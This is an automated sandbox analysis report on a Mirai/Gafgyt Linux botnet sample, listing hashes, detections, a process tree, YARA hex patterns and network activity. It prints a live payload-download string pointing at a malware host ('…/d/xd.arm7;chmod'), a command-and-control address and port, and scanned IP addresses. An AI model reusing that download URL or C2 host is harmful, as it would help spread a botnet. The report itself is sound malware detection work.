Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Linux Analysis Report
xd.sh4.elf

Overview

General Information

Sample name:xd.sh4.elf
Analysis ID:1654967
MD5:36584cff9e8b6f567ccbec876174ed0e
SHA1:a1527c38535889a395d57101ce8e6731099ae9fa
SHA256:4cba27a0b9f0fa526fad50047b72767853b55ad5bda6636469046486835bd9bc
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample deletes itself
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to kill multiple processes (SIGKILL)
Deletes log files
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654967
Start date and time:2025-04-02 20:47:24 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:xd.sh4.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/16@0/0
  • Connection to analysis system has been lost, crash info: Unknown
  • VT rate limit hit for: http://213.209.129.92/d/xd.arm7;chmod

Process Tree

  • system is lnxubuntu20
  • xd.sh4.elf (PID: 5414, Parent: 5336, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/xd.sh4.elf
  • systemd New Fork (PID: 5449, Parent: 1)
  • journalctl (PID: 5449, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5465, Parent: 1)
  • systemd New Fork (PID: 5466, Parent: 1)
  • systemd New Fork (PID: 5472, Parent: 1)
  • systemd New Fork (PID: 5473, Parent: 1)
  • systemd New Fork (PID: 5474, Parent: 1)
  • systemd New Fork (PID: 5525, Parent: 1)
  • systemd New Fork (PID: 5528, Parent: 1)
  • systemd New Fork (PID: 5529, Parent: 1)
  • systemd New Fork (PID: 5531, Parent: 1)
  • systemd New Fork (PID: 5532, Parent: 1)
  • systemd New Fork (PID: 5533, Parent: 1)
  • systemd New Fork (PID: 5534, Parent: 2935)
  • pulseaudio (PID: 5534, Parent: 2935, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5535, Parent: 1)
  • gdm3 New Fork (PID: 5536, Parent: 1400)
  • Default (PID: 5536, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5537, Parent: 1400)
  • Default (PID: 5537, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5538, Parent: 1400)
  • Default (PID: 5538, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5539, Parent: 1)
  • systemd New Fork (PID: 5541, Parent: 1)
  • systemd New Fork (PID: 5543, Parent: 1)
  • systemd New Fork (PID: 5544, Parent: 1)
  • gpu-manager (PID: 5544, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5545, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5546, Parent: 5545)
      • grep (PID: 5546, Parent: 5545, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5547, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5548, Parent: 5547)
      • grep (PID: 5548, Parent: 5547, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5549, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5550, Parent: 5549)
      • grep (PID: 5550, Parent: 5549, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5551, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5552, Parent: 5551)
      • grep (PID: 5552, Parent: 5551, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5553, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5554, Parent: 5553)
      • grep (PID: 5554, Parent: 5553, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5555, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5556, Parent: 5555)
      • grep (PID: 5556, Parent: 5555, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5557, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5558, Parent: 5557)
      • grep (PID: 5558, Parent: 5557, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5559, Parent: 5544, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5560, Parent: 5559)
      • grep (PID: 5560, Parent: 5559, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5561, Parent: 1)
  • generate-config (PID: 5561, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5562, Parent: 5561, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5563, Parent: 1)
  • gdm-wait-for-drm (PID: 5563, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • gdm3 (PID: 5564, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
  • fusermount (PID: 5586, Parent: 3122, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • gpu-manager (PID: 5596, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 5607, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 5617, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 5627, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • gpu-manager (PID: 5637, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • plymouth (PID: 5647, Parent: 1, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: /bin/plymouth quit
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
xd.sh4.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    xd.sh4.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
      xd.sh4.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        xd.sh4.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x11624:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11638:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1164c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11660:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11674:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11688:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1169c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x116b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x116c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x116d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x116ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11700:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11714:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11728:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1173c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11750:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11764:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11778:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1178c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x117a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x117b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        xd.sh4.elfLinux_Trojan_Gafgyt_ea92cca8unknownunknown
        • 0x115c0:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
        Click to see the 2 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
          5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
            5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
              • 0x11624:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x11638:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1164c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x11660:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x11674:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x11688:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1169c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x116b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x116c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x116d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x116ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x11700:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x11714:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x11728:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1173c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x11750:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x11764:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x11778:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1178c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x117a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x117b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmpLinux_Trojan_Gafgyt_ea92cca8unknownunknown
              • 0x115c0:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
              Click to see the 72 entries

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              • AV Detection
              • Bitcoin Miner
              • Networking
              • System Summary
              • Persistence and Installation Behavior
              • Hooking and other Techniques for Hiding and Protection
              • Malware Analysis System Evasion
              • Stealing of Sensitive Information
              • Remote Access Functionality

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: xd.sh4.elfAvira: detected
              Source: xd.sh4.elfVirustotal: Detection: 63%Perma Link
              Source: xd.sh4.elfReversingLabs: Detection: 63%
              Source: /usr/bin/pulseaudio (PID: 5534)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: global trafficTCP traffic: 192.168.2.13:56002 -> 213.209.129.92:5466
              Source: /tmp/xd.sh4.elf (PID: 5417)Socket: 0.0.0.0:23Jump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)Socket: 0.0.0.0:0Jump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)Socket: 0.0.0.0:80Jump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)Socket: 0.0.0.0:81Jump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)Socket: 0.0.0.0:8443Jump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)Socket: 0.0.0.0:9009Jump to behavior
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.129.92
              Source: unknownTCP traffic detected without corresponding DNS query: 152.177.102.169
              Source: unknownTCP traffic detected without corresponding DNS query: 148.127.109.169
              Source: unknownTCP traffic detected without corresponding DNS query: 199.55.214.174
              Source: unknownTCP traffic detected without corresponding DNS query: 173.93.73.222
              Source: unknownTCP traffic detected without corresponding DNS query: 182.226.239.207
              Source: unknownTCP traffic detected without corresponding DNS query: 240.50.47.31
              Source: unknownTCP traffic detected without corresponding DNS query: 222.108.206.164
              Source: unknownTCP traffic detected without corresponding DNS query: 141.163.163.151
              Source: unknownTCP traffic detected without corresponding DNS query: 1.131.92.134
              Source: unknownTCP traffic detected without corresponding DNS query: 254.24.37.146
              Source: unknownTCP traffic detected without corresponding DNS query: 223.51.198.111
              Source: unknownTCP traffic detected without corresponding DNS query: 118.59.160.166
              Source: unknownTCP traffic detected without corresponding DNS query: 121.14.215.75
              Source: unknownTCP traffic detected without corresponding DNS query: 205.228.153.136
              Source: unknownTCP traffic detected without corresponding DNS query: 36.235.188.75
              Source: unknownTCP traffic detected without corresponding DNS query: 61.103.199.165
              Source: unknownTCP traffic detected without corresponding DNS query: 149.103.43.192
              Source: unknownTCP traffic detected without corresponding DNS query: 162.1.112.64
              Source: unknownTCP traffic detected without corresponding DNS query: 183.157.118.198
              Source: unknownTCP traffic detected without corresponding DNS query: 113.182.54.166
              Source: unknownTCP traffic detected without corresponding DNS query: 164.136.54.216
              Source: unknownTCP traffic detected without corresponding DNS query: 35.224.125.126
              Source: unknownTCP traffic detected without corresponding DNS query: 2.194.62.141
              Source: unknownTCP traffic detected without corresponding DNS query: 195.228.30.59
              Source: unknownTCP traffic detected without corresponding DNS query: 140.239.185.170
              Source: unknownTCP traffic detected without corresponding DNS query: 107.226.200.178
              Source: unknownTCP traffic detected without corresponding DNS query: 103.238.148.44
              Source: unknownTCP traffic detected without corresponding DNS query: 90.242.7.190
              Source: unknownTCP traffic detected without corresponding DNS query: 148.103.192.36
              Source: unknownTCP traffic detected without corresponding DNS query: 193.185.140.67
              Source: unknownTCP traffic detected without corresponding DNS query: 84.245.129.125
              Source: unknownTCP traffic detected without corresponding DNS query: 157.230.181.161
              Source: unknownTCP traffic detected without corresponding DNS query: 82.108.164.163
              Source: unknownTCP traffic detected without corresponding DNS query: 53.198.36.54
              Source: unknownTCP traffic detected without corresponding DNS query: 9.73.33.143
              Source: unknownTCP traffic detected without corresponding DNS query: 178.183.191.180
              Source: unknownTCP traffic detected without corresponding DNS query: 216.173.227.244
              Source: unknownTCP traffic detected without corresponding DNS query: 98.91.152.18
              Source: unknownTCP traffic detected without corresponding DNS query: 159.46.115.179
              Source: unknownTCP traffic detected without corresponding DNS query: 183.241.135.71
              Source: unknownTCP traffic detected without corresponding DNS query: 195.55.88.62
              Source: unknownTCP traffic detected without corresponding DNS query: 192.143.250.212
              Source: unknownTCP traffic detected without corresponding DNS query: 188.59.192.117
              Source: unknownTCP traffic detected without corresponding DNS query: 166.189.13.125
              Source: unknownTCP traffic detected without corresponding DNS query: 175.74.49.93
              Source: unknownTCP traffic detected without corresponding DNS query: 149.228.162.41
              Source: unknownTCP traffic detected without corresponding DNS query: 180.56.191.19
              Source: unknownTCP traffic detected without corresponding DNS query: 208.198.22.217
              Source: unknownTCP traffic detected without corresponding DNS query: 171.47.160.33
              Source: xd.sh4.elfString found in binary or memory: http://213.209.129.92/d/xd.arm7;chmod

              System Summary

              barindex
              Source: xd.sh4.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: xd.sh4.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: xd.sh4.elf, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: xd.sh4.elf, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
